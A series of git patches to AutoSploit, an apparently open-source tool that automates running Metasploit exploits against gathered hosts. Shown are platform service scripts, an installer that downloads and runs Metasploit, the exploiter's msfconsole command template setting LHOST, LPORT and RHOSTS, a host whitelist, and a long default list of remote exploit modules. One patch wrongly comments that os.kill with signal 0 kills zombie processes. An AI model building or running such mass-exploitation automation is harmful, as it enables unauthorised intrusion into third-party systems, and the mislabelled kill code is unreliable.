+1,3 @@ +#!/bin/bash + +brew services restart postgresql diff --git a/lib/settings.py b/lib/settings.py index ba136c6..7e28523 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -27,9 +27,15 @@ # path to the bash script to stack the PostgreSQL service START_POSTGRESQL_PATH = "{}/etc/scripts/start_postgre.sh".format(CUR_DIR) +# path to the bash script to stack the PostgreSQL service on OSX +START_POSTGRESQL_OSX_PATH = "{}/etc/scripts/start_postgre_osx.sh".format(CUR_DIR) + # path to the bash script to start the Apache service START_APACHE_PATH = "{}/etc/scripts/start_apache.sh".format(CUR_DIR) +# path to the bash script to start the Apache service on OSX +START_APACHE_PATH = "{}/etc/scripts/start_apache_osx.sh".format(CUR_DIR) + # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name From fd112f2b8dd3db7f9e93ea3e5001bc6694ef3531 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:48:40 -0500 Subject: [PATCH 11/31] moving the translations into their own directory and will have a link to them in the near future --- README-fr.md => .github/.transaltions/README-fr.md | 0 README-zh.md => .github/.transaltions/README-zh.md | 0 etc/scripts/start_apache.sh | 3 --- etc/scripts/start_apache_osx.sh | 3 --- etc/scripts/start_postgre.sh | 3 --- etc/scripts/start_postgre_osx.sh | 3 --- etc/scripts/start_services.sh | 1 + 7 files changed, 1 insertion(+), 12 deletions(-) rename README-fr.md => .github/.transaltions/README-fr.md (100%) rename README-zh.md => .github/.transaltions/README-zh.md (100%) delete mode 100644 etc/scripts/start_apache.sh delete mode 100644 etc/scripts/start_apache_osx.sh delete mode 100644 etc/scripts/start_postgre.sh delete mode 100644 etc/scripts/start_postgre_osx.sh create mode 100644 etc/scripts/start_services.sh diff --git a/README-fr.md b/.github/.transaltions/README-fr.md similarity index 100% rename from README-fr.md rename to .github/.transaltions/README-fr.md diff --git a/README-zh.md b/.github/.transaltions/README-zh.md similarity index 100% rename from README-zh.md rename to .github/.transaltions/README-zh.md diff --git a/etc/scripts/start_apache.sh b/etc/scripts/start_apache.sh deleted file mode 100644 index 6d18460..0000000 --- a/etc/scripts/start_apache.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -sudo service apache2 start > /dev/null 2>&1 diff --git a/etc/scripts/start_apache_osx.sh b/etc/scripts/start_apache_osx.sh deleted file mode 100644 index 1e74ae7..0000000 --- a/etc/scripts/start_apache_osx.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -sudo apachectl start diff --git a/etc/scripts/start_postgre.sh b/etc/scripts/start_postgre.sh deleted file mode 100644 index d5d279a..0000000 --- a/etc/scripts/start_postgre.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -sudo service postgresql start > /dev/null 2>&1 diff --git a/etc/scripts/start_postgre_osx.sh b/etc/scripts/start_postgre_osx.sh deleted file mode 100644 index 8812af6..0000000 --- a/etc/scripts/start_postgre_osx.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -brew services restart postgresql diff --git a/etc/scripts/start_services.sh b/etc/scripts/start_services.sh new file mode 100644 index 0000000..212c4ba --- /dev/null +++ b/etc/scripts/start_services.sh @@ -0,0 +1 @@ +#!/usr/bin/env bash \ No newline at end of file From c2d808d3f2b598a7780c3733d9446c50db1cb25f Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:48:58 -0500 Subject: [PATCH 12/31] working on the translations links --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 19f4455..71b5d4a 100644 --- a/README.md +++ b/README.md @@ -21,6 +21,7 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) + - [README translations]() # Installation @@ -177,3 +178,8 @@ If you need some help understanding the code, or want to chat with some other Au If you happen to encounter a bug please feel free to [Open a Ticket](https://github.com/NullArray/AutoSploit/issues). Thanks in advance. + +## Translations + + - [FR]() + - [ZH]() From e2b26d4107c173785746d7e1a34aacc673ef7ca8 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:49:40 -0500 Subject: [PATCH 13/31] starting compatibility with macos --- autosploit/main.py | 40 ++++++++++++----------------------- etc/scripts/start_services.sh | 32 +++++++++++++++++++++++++++- 2 files changed, 44 insertions(+), 28 deletions(-) diff --git a/autosploit/main.py b/autosploit/main.py index 83b4ae9..ff1ac81 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -7,7 +7,6 @@ from lib.output import ( info, warning, - error, prompt, misc_info ) @@ -16,11 +15,9 @@ load_api_keys, check_services, cmdline, + close, EXPLOIT_FILES_PATH, - START_APACHE_PATH, - START_APACHE_OSX_PATH, - START_POSTGRESQL_PATH, - START_POSTGRESQL_OSX_PATH + START_SERVICES_PATH ) from lib.jsonize import load_exploits @@ -31,12 +28,12 @@ def main(): logo() info("welcome to autosploit, give us a little bit while we configure") + misc_info("checking your running platform") + platform_running = platform.system() misc_info("checking for disabled services") - # according to ps aux, postgre and apache2 are the names of the services - - if platform.system() == "Darwin": - service_names = ("postgres","httpd") - elif platform.system() == "Linux": + # according to ps aux, postgre and apache2 are the names of the services on Linux systems + service_names = ("postgres", "apache2") + if "darwin" in platform_running.lower(): service_names = ("postgres", "apache2") for service in list(service_names): @@ -48,22 +45,12 @@ def main(): ) if choice.lower().startswith("y"): try: - if "postgre" in service: - if platform.system() == "Linux": - cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) - elif platform.system() == "Darwin": - cmdline("sudo bash {}".format(START_POSTGRESQL_OSX_PATH)) - else: - error("Currently not supporting windows") - sys.exit(1) + if "darwin" in platform_running.lower(): + cmdline("{} darwin".format(START_SERVICES_PATH)) + elif "linux" in platform_running.lower(): + cmdline("{} linux".format(START_SERVICES_PATH)) else: - if platform.system() == "Linux": - cmdline("sudo bash {}".format(START_APACHE_PATH)) - elif platform.system() == "Darwin": - cmdline("sudo bash {}".format(START_APACHE_OSX_PATH)) - else: - error("Currently not supporting windows") - sys.exit(1) + close("your platform is not supported by AutoSploit at this time", status=2) # moving this back because it was funky to see it each run info("services started successfully") @@ -72,13 +59,12 @@ def main(): except psutil.NoSuchProcess: pass else: - error( + close( "service {} is required to be started for autosploit to run successfully (you can do it manually " "by using the command `sudo service {} start`), exiting".format( service.title(), service ) ) - sys.exit(1) if len(sys.argv) > 1: info("attempting to load API keys") diff --git a/etc/scripts/start_services.sh b/etc/scripts/start_services.sh index 212c4ba..2a4ca0f 100644 --- a/etc/scripts/start_services.sh +++ b/etc/scripts/start_services.sh @@ -1 +1,31 @@ -#!/usr/bin/env bash \ No newline at end of file +#!/bin/bash + +function startApacheLinux () { + sudo service apache2 start > /dev/null 2>&1 +} + +function startPostgreSQLLinux () { + sudo service postgresql start > /dev/null 2>&1 +} + +function startApacheOSX () { + sudo apachectl start > /dev/null 2>&1 +} + +function startPostgreSQLOSX () { + brew services restart postgresql > /dev/null 2>&1 +} + +function main () { + if [ $1 == "linux" ]; then + startApacheLinux; + startPostgreSQLLinux; + elif [ $1 == "darwin" ]; then + startApacheOSX; + startPostgreSQLOSX; + else + echo "[*} invalid operating system"; + fi +} + +main $@; \ No newline at end of file From bf6c2308d48ba1965d0d5667957d4cb1e855030a Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:49:53 -0500 Subject: [PATCH 14/31] starting compatibility with macos --- install.sh | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/install.sh b/install.sh index b00b4a5..2d4b49c 100755 --- a/install.sh +++ b/install.sh @@ -9,20 +9,29 @@ echo "| | || | | | | |\ || | | || || | | | "; echo "|__|__| \__,_| |__| \___/ \___||__| |_____| \___/|____| |__| "; echo " "; -function installDebian() { +function installDebian () { sudo apt-get update; sudo apt-get -y install git python2.7 python-pip postgresql apache2; pip2 install requests psutil; installMSF; } -function installFedora() { +function installFedora () { sudo yum -y install git python-pip; pip2 install requests psutil; installMSF; } -function installMSF() { +function installOSX () { + sudo /usr/sbin/apachectl start; + brew doctor; + brew update; + brew install postgresql; + brew services start postgresql; + installMSF; +} + +function installMSF () { if [[ ! "$(which msfconsole)" = */* ]]; then curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ @@ -31,7 +40,7 @@ function installMSF() { fi } -function install() { +function install () { case "$(uname -a)" in *Debian*|*Ubuntu*) installDebian; @@ -39,8 +48,11 @@ function install() { *Fedora*) installFedora; ;; + *Darwin*) + installOSX; + ;; *) - echo "Unable to detect Linux flavor..."; + echo "Unable to detect operating system that is compatible with AutoSploit..."; ;; esac echo ""; From e2e72d54b1e7912795d7140981245550a8c5d283 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:50:01 -0500 Subject: [PATCH 15/31] starting compatibility with macos --- lib/settings.py | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/lib/settings.py b/lib/settings.py index 7e28523..b90900d 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -24,17 +24,8 @@ # path to the usage and legal file USAGE_AND_LEGAL_PATH = "{}/etc/text_files/general".format(CUR_DIR) -# path to the bash script to stack the PostgreSQL service -START_POSTGRESQL_PATH = "{}/etc/scripts/start_postgre.sh".format(CUR_DIR) - -# path to the bash script to stack the PostgreSQL service on OSX -START_POSTGRESQL_OSX_PATH = "{}/etc/scripts/start_postgre_osx.sh".format(CUR_DIR) - -# path to the bash script to start the Apache service -START_APACHE_PATH = "{}/etc/scripts/start_apache.sh".format(CUR_DIR) - -# path to the bash script to start the Apache service on OSX -START_APACHE_PATH = "{}/etc/scripts/start_apache_osx.sh".format(CUR_DIR) +# one bash script to rule them all takes an argument via the operating system +START_SERVICES_PATH = "{}/etc/scripts/start_services.sh".format(CUR_DIR) # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name From 9ca2fd0590e7c73bf5aaa1fee733128301b1f926 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:54:04 -0500 Subject: [PATCH 16/31] fixed a typo and created translation links (will not work until pushed to master) --- .github/{.transaltions => .translations}/README-fr.md | 0 .github/{.transaltions => .translations}/README-zh.md | 0 README.md | 6 +++--- 3 files changed, 3 insertions(+), 3 deletions(-) rename .github/{.transaltions => .translations}/README-fr.md (100%) rename .github/{.transaltions => .translations}/README-zh.md (100%) diff --git a/.github/.transaltions/README-fr.md b/.github/.translations/README-fr.md similarity index 100% rename from .github/.transaltions/README-fr.md rename to .github/.translations/README-fr.md diff --git a/.github/.transaltions/README-zh.md b/.github/.translations/README-zh.md similarity index 100% rename from .github/.transaltions/README-zh.md rename to .github/.translations/README-zh.md diff --git a/README.md b/README.md index 71b5d4a..22b5349 100644 --- a/README.md +++ b/README.md @@ -21,7 +21,7 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) - - [README translations]() + - [README translations](https://github.com/NullArray/AutoSploit#translations) # Installation @@ -181,5 +181,5 @@ Thanks in advance. ## Translations - - [FR]() - - [ZH]() + - [FR](https://github.com/NullArray/AutoSploit/blob/master/.github/.translations/README-fr.md) + - [ZH](https://github.com/NullArray/AutoSploit/blob/master/.github/.translations/README-zh.md) From fc5f6aee1af78203a2a8ded5e9720ada5a3ed96d Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:56:35 -0500 Subject: [PATCH 17/31] implement issue #99 --- lib/exploitation/exploiter.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 445672a..f8cdc16 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -42,7 +42,7 @@ def start_exploit(self): template = ( "sudo {} {} -x 'workspace -a {}; " "setg LHOST {}; setg LPORT {}; setg VERBOSE " - "true; setg THREADS 100; set RHOSTS {}; use {} -j;'" + "true; setg THREADS 100; set RHOST {}; set RHOSTS {}; use {} -j;'" ) for host in self.hosts: for mod in self.mods: @@ -55,6 +55,6 @@ def start_exploit(self): "ruby" if self.ruby_exec else "", self.msf_path if self.msf_path is not None else "msfconsole", self.configuration[0], self.configuration[1], self.configuration[2], - host.strip(), mod.strip() + host.strip(), host.strip(), mod.strip() ) lib.settings.cmdline(template) From df45d4d1362c7c68059dd046ac84c14a522d8f05 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 16:30:27 -0500 Subject: [PATCH 18/31] minor update to one of the banners --- lib/banner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/banner.py b/lib/banner.py index 323fe52..6f14683 100644 --- a/lib/banner.py +++ b/lib/banner.py @@ -67,7 +67,7 @@ def banner_4(): {red} .__. , __. . , {end} {red} [__]. .-+- _ (__ ._ | _ *-+- {end} {red} | |(_| | (_).__)[_)|(_)| | {end} -{red} | {end} +{red} | {end} {red} _ ._ _ , _ ._ {end} {red} (_ ' ( ` )_ .__) {end} {red} ( ( ( ) `) ) _) {end} From b5b2b2acec62e4ffa5e53f724929c205c10db460 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 16:30:47 -0500 Subject: [PATCH 19/31] edited some minor details depnding on your OS --- autosploit/main.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/autosploit/main.py b/autosploit/main.py index ff1ac81..e3838ce 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -34,7 +34,7 @@ def main(): # according to ps aux, postgre and apache2 are the names of the services on Linux systems service_names = ("postgres", "apache2") if "darwin" in platform_running.lower(): - service_names = ("postgres", "apache2") + service_names = ("postgres", "apachectl") for service in list(service_names): while not check_services(service): @@ -59,10 +59,13 @@ def main(): except psutil.NoSuchProcess: pass else: + process_start_command = "`sudo service {} start`" + if "darwin" in platform_running.lower(): + process_start_command = "`brew services start {}`" close( "service {} is required to be started for autosploit to run successfully (you can do it manually " - "by using the command `sudo service {} start`), exiting".format( - service.title(), service + "by using the command {}), exiting".format( + service.title(), process_start_command.format(service) ) ) From 87c0cb0c66f5fa9356bdc474eae839e908d3109e Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 16:31:09 -0500 Subject: [PATCH 20/31] caught an exception that happens from psutils --- lib/settings.py | 24 ++++++++++++++++-------- 1 file changed, 16 insertions(+), 8 deletions(-) diff --git a/lib/settings.py b/lib/settings.py index b90900d..4727260 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -85,14 +85,22 @@ def check_services(service_name): """ check to see if certain services ar started """ - all_processes = set() - for pid in psutil.pids(): - running_proc = psutil.Process(pid) - all_processes.add(" ".join(running_proc.cmdline()).strip()) - for proc in list(all_processes): - if service_name in proc: - return True - return False + try: + all_processes = set() + for pid in psutil.pids(): + running_proc = psutil.Process(pid) + all_processes.add(" ".join(running_proc.cmdline()).strip()) + for proc in list(all_processes): + if service_name in proc: + return True + return False + except psutil.ZombieProcess as e: + # zombie processes appear to happen on macOS for some reason + # so we'll just kill them off + pid = str(e).split("=")[-1].split(")")[0] + os.kill(int(pid), 0) + return True + def write_to_file(data_to_write, filename, mode="a+"): From 9a8a67228dd47f32de0f0b1ee8ad1fc6c14badb9 Mon Sep 17 00:00:00 2001 From: atucom Date: Mon, 26 Mar 2018 10:52:51 -0500 Subject: [PATCH 21/31] Changed the host_path check to not override itself (#105) The try except block was overriding the path var with the contents of the folder causing errors further down. Changed to just check for proper opening of the file. --- lib/term/terminal.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/term/terminal.py b/lib/term/terminal.py index 5287e5d..b3c5e40 100644 --- a/lib/term/terminal.py +++ b/lib/term/terminal.py @@ -19,8 +19,9 @@ def __init__(self, tokens): self.tokens = tokens self.usage_path = lib.settings.USAGE_AND_LEGAL_PATH self.sep = "-" * 30 + self.host_path = lib.settings.HOST_FILE try: - self.host_path = open(lib.settings.HOST_FILE).readlines() + open(lib.settings.HOST_FILE).readlines() except IOError: lib.output.warning("no hosts file present, you need to gather some hosts") self.host_path = lib.settings.HOST_FILE From 02aac59b7f88944c61a66b066be6873f55f70a3e Mon Sep 17 00:00:00 2001 From: atucom <466817+atucom@users.noreply.github.com> Date: Tue, 27 Mar 2018 11:48:32 -0500 Subject: [PATCH 22/31] Fixed exploit_gathered_hosts() to read the hosts (#107) --- lib/term/terminal.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/term/terminal.py b/lib/term/terminal.py index b3c5e40..f8766bc 100644 --- a/lib/term/terminal.py +++ b/lib/term/terminal.py @@ -170,7 +170,7 @@ def exploit_gathered_hosts(self, loaded_mods, hosts=None): ruby_exec = False msf_path = None if hosts is None: - host_file = self.host_path + host_file = open(self.host_path).readlines() else: host_file = open(hosts).readlines() if not lib.settings.check_for_msf(): From 6dcbb75fd1419eacd14a4aa913c97fbaea7cd962 Mon Sep 17 00:00:00 2001 From: atucom <466817+atucom@users.noreply.github.com> Date: Tue, 27 Mar 2018 16:49:53 -0500 Subject: [PATCH 23/31] fixed check_for_msf() to check in $PATH (#108) * fixed check_for_msf() to check in $PATH * check_msf_path() now checks both os.environ and PATH --- lib/settings.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/settings.py b/lib/settings.py index 4727260..a6a91fd 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -6,6 +6,7 @@ import platform import getpass import tempfile +import distutils.spawn # import subprocess import psutil @@ -179,7 +180,7 @@ def check_for_msf(): """ check the ENV PATH for msfconsole """ - return os.getenv("msfconsole", False) + return os.getenv("msfconsole", False) or distutils.spawn.find_executable("msfconsole") def logo(): """ From 629332f4a04b0831a4023d518d906a1276ec4df5 Mon Sep 17 00:00:00 2001 From: atucom <466817+atucom@users.noreply.github.com> Date: Thu, 29 Mar 2018 13:38:18 -0500 Subject: [PATCH 24/31] Cmdline Whitelist Feature (#110) * Added whitelist arg and modified the Exploiter call * added the whitelist_wash function * added whitelist prompt to terminal * added check for isspace() --- lib/cmdline/cmd.py | 7 ++++++- lib/exploitation/exploiter.py | 16 ++++++++++++++++ lib/term/terminal.py | 13 +++++++++++-- 3 files changed, 33 insertions(+), 3 deletions(-) diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index ec0d9ea..55425a2 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -67,6 +67,8 @@ def optparser(): help="pass the path to your framework if it is not in your ENV PATH") misc.add_argument("--ethics", action="store_true", dest="displayEthics", help=argparse.SUPPRESS) # easter egg! + misc.add_argument("--whitelist", metavar="PATH", dest="whitelist", + help="only exploit hosts listed in the whitelist file") opts = parser.parse_args() return opts @@ -160,10 +162,13 @@ def single_run_args(opt, keys, loaded_modules): keys["censys"][1], keys["censys"][0], opt.searchQuery, proxy=headers[0], agent=headers[1] ).censys() if opt.startExploit: + hosts = open(lib.settings.HOST_FILE).readlines() + if opt.whitelist: + hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist) lib.exploitation.exploiter.AutoSploitExploiter( opt.msfConfig, loaded_modules, - open(lib.settings.HOST_FILE).readlines(), + hosts, ruby_exec=opt.rubyExecutableNeeded, msf_path=opt.pathToFramework ).start_exploit() diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index f8cdc16..3525e5f 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -1,6 +1,22 @@ import lib.settings import lib.output +def whitelist_wash(hosts, whitelist_file): + """ + remove IPs from hosts list that do not appear in WHITELIST_FILE + """ + whitelist_hosts = open(whitelist_file).readlines() + lib.output.info('Found {} entries in whitelist.txt, scrubbing'.format(str(len(whitelist_hosts)))) + washed_hosts = [] + #return supplied hosts if whitelist file is empty + if len(whitelist_hosts) == 0: + return hosts + else: + for host in hosts: + if host in whitelist_hosts: + washed_hosts.append(host) + + return washed_hosts class AutoSploitExploiter(object): diff --git a/lib/term/terminal.py b/lib/term/terminal.py index f8766bc..c0bf2da 100644 --- a/lib/term/terminal.py +++ b/lib/term/terminal.py @@ -169,10 +169,19 @@ def exploit_gathered_hosts(self, loaded_mods, hosts=None): """ ruby_exec = False msf_path = None + whitelist_file = lib.output.prompt("specify full path to a whitelist file, otherwise hit enter", lowercase=False) if hosts is None: - host_file = open(self.host_path).readlines() + if whitelist_file is not "" and not whitelist_file.isspace(): + # If whitelist is specified, return a washed hosts list + host_file = lib.exploitation.exploiter.whitelist_wash(open(self.host_path).readlines(), whitelist_file) + else: + host_file = open(self.host_path).readlines() else: - host_file = open(hosts).readlines() + if whitelist_file is not "" and not whitelist_file.isspace(): + # If whitelist is specified, return a washed hosts list + host_file = lib.exploitation.exploiter.whitelist_wash(open(hosts).readlines(), whitelist_file) + else: + host_file = open(hosts).readlines() if not lib.settings.check_for_msf(): msf_path = lib.output.prompt( "it appears that MSF is not in your PATH, provide the full path to msfconsole" From 13526de3c83afb6e60a9a446f83bbf5781bd121e Mon Sep 17 00:00:00 2001 From: atucom <466817+atucom@users.noreply.github.com> Date: Mon, 2 Apr 2018 21:49:11 -0500 Subject: [PATCH 25/31] fixed double active dev section in README (#115) --- README.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/README.md b/README.md index 22b5349..e253c11 100644 --- a/README.md +++ b/README.md @@ -160,10 +160,6 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. -### Active Development - -While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. - I've been working on the new version of the tool in an open source capacity with the help of a number of developers that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). From 74c6feff060b554ea8e23f91d2bb53c0fef2ccd0 Mon Sep 17 00:00:00 2001 From: Sebastien Lorrain Date: Tue, 3 Apr 2018 13:07:06 -0400 Subject: [PATCH 26/31] Exploit reporting (#116) * Added a helpful link directory * Update README.md * Update README.md * Update README.md * Added reporting to CSV file Metasploit output is logged (anything prefixed by '[+||-||*]') Changed from straight command-line invocation to rc-scripts per-hosts/per-modules. MSF module output to console * updating the output image * updating the output for this as well --- etc/json/default_modules.json | 570 +++++++++++++++++----------------- lib/exploitation/exploiter.py | 105 ++++++- lib/settings.py | 28 +- 3 files changed, 398 insertions(+), 305 deletions(-) diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index ca7f102..f30a51b 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json @@ -1,289 +1,289 @@ { "exploits": [ - "exploit/windows/firewall/blackice_pam_icq; exploit", - "exploit/windows/ftp/ms09_053_ftpd_nlst;exploit", - "exploit/windows/http/amlibweb_webquerydll_app;exploit", - "exploit/windows/http/ektron_xslt_exec_ws;exploit", - "exploit/windows/http/umbraco_upload_aspx;exploit", - "exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit", - "exploit/windows/iis/iis_webdav_upload_asp;exploit", - "exploit/windows/iis/ms01_023_printer;exploit", - "exploit/windows/iis/ms01_026_dbldecode;exploit", - "exploit/windows/iis/ms01_033_idq;exploit", - "exploit/windows/iis/ms02_018_htr;exploit", - "exploit/windows/iis/ms02_065_msadc;exploit", - "exploit/windows/iis/ms03_007_ntdll_webdav;exploit", - "exploit/windows/iis/msadc;exploit", - "exploit/windows/isapi/ms00_094_pbserver;exploit", - "exploit/windows/isapi/ms03_022_nsiislog_post;exploit", - "exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit", - "exploit/windows/isapi/rsa_webagent_redirect;exploit", - "exploit/windows/isapi/w3who_query;exploit", - "exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit", - "exploit/windows/ssl/ms04_011_pct;exploit", - "exploit/freebsd/http/watchguard_cmd_exec;exploit ", - "exploit/linux/http/alienvault_exec;exploit ", - "exploit/linux/http/alienvault_sqli_exec;exploit ", - "exploit/linux/http/astium_sqli_upload;exploit ", - "exploit/linux/http/centreon_sqli_exec;exploit ", - "exploit/linux/http/centreon_useralias_exec;exploit ", - "exploit/linux/http/crypttech_cryptolog_login_exec;exploit ", - "exploit/linux/http/dolibarr_cmd_exec;exploit ", - "exploit/linux/http/goautodial_3_rce_command_injection;exploit", - "exploit/linux/http/kloxo_sqli;exploit ", - "exploit/linux/http/nagios_xi_chained_rce;exploit ", - "exploit/linux/http/netgear_wnr2000_rce;exploit ", - "exploit/linux/http/pandora_fms_sqli;exploit ", - "exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit ", - "exploit/linux/http/wd_mycloud_multiupload_upload;exploit ", - "exploit/linux/http/zabbix_sqli;exploit ", - "exploit/linux/misc/qnap_transcode_server;exploit ", - "exploit/linux/mysql/mysql_yassl_getname;exploit ", - "exploit/linux/mysql/mysql_yassl_hello;exploit ", - "exploit/linux/postgres/postgres_payload;exploit ", - "exploit/linux/samba/is_known_pipename;exploit ", - "exploit/multi/browser/java_jre17_driver_manager;exploit ", - "exploit/multi/http/atutor_sqli;exploit ", - "exploit/multi/http/dexter_casinoloader_exec;exploit ", - "exploit/multi/http/drupal_drupageddon;exploit ", - "exploit/multi/http/manage_engine_dc_pmp_sqli;exploit ", - "exploit/multi/http/manageengine_search_sqli;exploit ", - "exploit/multi/http/movabletype_upgrade_exec;exploit ", - "exploit/multi/http/php_volunteer_upload_exe;exploit ", - "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit ", - "exploit/multi/http/splunk_mappy_exec;exploit ", - "exploit/multi/http/testlink_upload_exec;exploit ", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit ", - "exploit/multi/misc/legend_bot_exec;exploit ", - "exploit/multi/mysql/mysql_udf_payload;exploit ", - "exploit/multi/postgres/postgres_createlang;exploit ", - "exploit/solaris/sunrpc/ypupdated_exec;exploit ", - "exploit/unix/ftp/proftpd_133c_backdoor;exploit ", - "exploit/unix/http/tnftp_savefile;exploit ", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit ", - "exploit/unix/webapp/kimai_sqli;exploit ", - "exploit/unix/webapp/openemr_sqli_privesc_upload;exploit ", - "exploit/unix/webapp/seportal_sqli_exec;exploit ", - "exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit ", - "exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit", - "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit ", - "exploit/windows/http/apache_mod_rewrite_ldap;exploit ", - "exploit/windows/http/ca_totaldefense_regeneratereports;exploit", - "exploit/windows/http/cyclope_ess_sqli;exploit", - "exploit/windows/http/hp_mpa_job_acct;exploit", - "exploit/windows/http/solarwinds_storage_manager_sql;exploit", - "exploit/windows/http/sonicwall_scrutinizer_sql;exploit", - "exploit/windows/misc/altiris_ds_sqli;exploit ", - "exploit/windows/misc/fb_cnct_group;exploit ", - "exploit/windows/misc/lianja_db_net;exploit ", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit ", - "exploit/windows/mssql/lyris_listmanager_weak_pass;exploit ", - "exploit/windows/mssql/ms02_039_slammer;exploit ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit ", - "exploit/windows/mssql/mssql_linkcrawler;exploit ", - "exploit/windows/mssql/mssql_payload;exploit ", - "exploit/windows/mssql/mssql_payload_sqli;exploit ", - "exploit/windows/mysql/mysql_mof;exploit ", - "exploit/windows/mysql/mysql_start_up;exploit ", - "exploit/windows/mysql/mysql_yassl_hello;exploit", - "exploit/windows/mysql/scrutinizer_upload_exec;exploit ", - "exploit/windows/postgres/postgres_payload;exploit ", - "exploit/windows/scada/realwin_on_fcs_login;exploit", - "exploit/multi/http/rails_actionpack_inline_exec;exploit", - "exploit/multi/http/rails_dynamic_render_code_exec;exploit", - "exploit/multi/http/rails_json_yaml_code_exec;exploit", - "exploit/multi/http/rails_secret_deserialization;exploit", - "exploit/multi/http/rails_web_console_v2_code_exec;exploit", - "exploit/multi/http/rails_xml_yaml_code_exec;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/phpmoadmin_exec;exploit", - "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", - "exploit/multi/http/phpmyadmin_preg_replace;exploit", - "exploit/multi/http/phpscheduleit_start_date;exploit", - "exploit/multi/http/phptax_exec;exploit", - "exploit/multi/http/phpwiki_ploticus_exec;exploit", - "exploit/multi/http/plone_popen2;exploit", - "exploit/multi/http/pmwiki_pagelist;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit", - "exploit/multi/http/novell_servicedesk_rce;exploit", - "exploit/multi/http/oracle_reports_rce;exploit", - "exploit/multi/http/php_utility_belt_rce;exploit", - "exploit/multi/http/phpfilemanager_rce;exploit", - "exploit/multi/http/processmaker_exec;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/spree_search_exec;exploit", - "exploit/multi/http/spree_searchlogic_exec;exploit", - "exploit/multi/http/struts_code_exec_parameters;exploit", - "exploit/multi/http/vtiger_install_rce;exploit", - 